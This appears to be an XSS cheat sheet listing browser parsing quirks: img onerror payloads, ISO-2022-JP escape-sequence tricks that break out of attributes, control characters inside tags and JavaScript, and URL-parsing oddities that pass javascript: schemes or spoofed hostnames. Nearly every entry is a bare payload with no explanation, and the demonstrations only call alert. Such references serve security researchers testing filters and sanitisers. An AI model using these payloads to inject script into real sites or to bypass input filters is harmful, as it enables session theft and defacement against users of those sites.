Cheat Sheet

<a id="0x1B$@"></a>0x1B(B<a id="><img src=x onerror=alert(64)></a>

<a id="0x1B$B"></a>0x1B(B<a id="><img src=x onerror=alert(66)></a>

let transformedChr = String.fromCodePoint(0).toLowerCase();0x0D
0 > 0x7f &&0x0D
/^\w+$/.test(transformedChr) &&0x0D
alert(0 + '=>' + transformedChr)

<0x1B(<img src onerror=alert(60)>

<0x1B(Bimg src onerror=alert(66)>

<a id="0x1B$B"></a>0x1B(B<a id="><img src=x onerror=alert(66)></a>

<a id="0x1B$B"></a>0x1B(J<a id="><img src=x onerror=alert(74)></a>

anchor.href='/0x09/example.com';0x0D
if(anchor.host === 'example.com')alert(9)

anchor.href='///example.com';0x0D
if(anchor.host === 'example.com')alert(47)

anchor.href='/\/example.com';0x0D
if(anchor.host === 'example.com')alert(92)

<img src 0x09onerror=alert(9)>

<img src 
onerror=alert(10)>

<img src 0x0Conerror=alert(12)>

<img src 0x0Donerror=alert(13)>

<img src  onerror=alert(32)>

1337⟦09⟧in0x09alert(9)

1337
in
alert(10)

13370x0Bin0x0Balert(11)

13370x0Cin0x0Calert(12)

13370x0Din0x0Dalert(13)

<img0x09src0x09onerror=alert(9)>

<img
src
onerror=alert(10)>

<img0x0Csrc0x0Conerror=alert(12)>

<img0x0Dsrc0x0Donerror=alert(13)>

<img src onerror=alert(32)>

document⟦09⟧['location'];alert(9)

document
['location'];alert(10)

document0x0B['location'];alert(11)

document0x0C['location'];alert(12)

document0x0D['location'];alert(13)

<a href="https://0x09example.com/" id="test9"></a>

<a href="https://
example.com/" id="test10"></a>

<a href="https://0x0Dexample.com/" id="test13"></a>

<a href="https:///example.com/" id="test47"></a>

<a href="https://@example.com/" id="test64"></a>

if (new URL(String.fromCodePoint(0) + "javascript:alert()").protocol=="javascript:"){alert(0)}

if (new URL(String.fromCodePoint(1) + "javascript:alert()").protocol=="javascript:"){alert(1)}

if (new URL(String.fromCodePoint(2) + "javascript:alert()").protocol=="javascript:"){alert(2)}

if (new URL(String.fromCodePoint(3) + "javascript:alert()").protocol=="javascript:"){alert(3)}

if (new URL(String.fromCodePoint(4) + "javascript:alert()").protocol=="javascript:"){alert(4)}

const c = String.fromCodePoint(i)0x0D
const c_upper = c.toUpperCase()0x0D
if (c_upper.length > c.length && isASCII(c_upper)){0x0D
    alert(c)0x0D
}

<div style="/**/color:red;">test</div>

<div style="font-family:'blah';color:red"></div>

var $=alert(36)

var _=alert(95)

var ª=alert(170)

var µ=alert(181)

<a href="//test.com/" id="test47"></a>

<a href="/\test.com/" id="test92"></a>

window⟦09⟧.alert();alert(9)

window
.alert();alert(10)

window0x0B.alert();alert(11)

window0x0C.alert();alert(12)

window0x0D.alert();alert(13)

const c = String.fromCodePoint(i);0x0D
0x0D
if (c.length !== c.toUpperCase().length) alert(i)

if (new URL("https://example.co" + String.fromCodePoint(9) + "m").hostname === 'example.com'){alert(9)}

if (new URL("https://example.co" + String.fromCodePoint(10) + "m").hostname === 'example.com'){alert(10)}

if (new URL("https://example.co" + String.fromCodePoint(13) + "m").hostname === 'example.com'){alert(13)}

if (new URL("https://example.co" + String.fromCodePoint(173) + "m").hostname === 'example.com'){alert(173)}

if (new URL("https://example.co" + String.fromCodePoint(847) + "m").hostname === 'example.com'){alert(847)}

<div class="0x09x0x09"></div>

<div class="
x
"></div>

<div class="0x0Cx0x0C"></div>

<div class="0x0Dx0x0D"></div>

<div class=" x "></div>